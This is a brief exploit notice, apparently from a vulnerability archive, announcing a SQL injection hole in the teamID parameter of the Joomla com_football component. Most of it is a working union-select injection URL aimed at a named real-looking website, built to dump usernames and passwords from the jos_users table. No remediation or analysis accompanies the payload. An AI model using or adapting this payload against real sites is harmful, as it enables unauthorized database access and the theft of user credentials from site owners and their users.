The Joomla Football component suffers from a SQL injection vulnerability.
3697aaa4cf43905c47e98a171b0056cc5f6c7e0dfca049508c36ef1fe08869eb
Joomla Component com_football (teamID) SQL Injection Vulnerability
Example:
http://www.cvhspreps.com/index.php?option=com_football&task=viewteam&teamID=-1+union+select+null,null,3,4,5,6,concat(username,char(58),password)KHG,8+from+jos_users--<http://www.cvhspreps.com/index.php?option=com_football&task=viewteam&teamID=-1+union+select+null,null,3,4,5,6,concat%28username,char%2858%29,password%29KHG,8+from+jos_users-->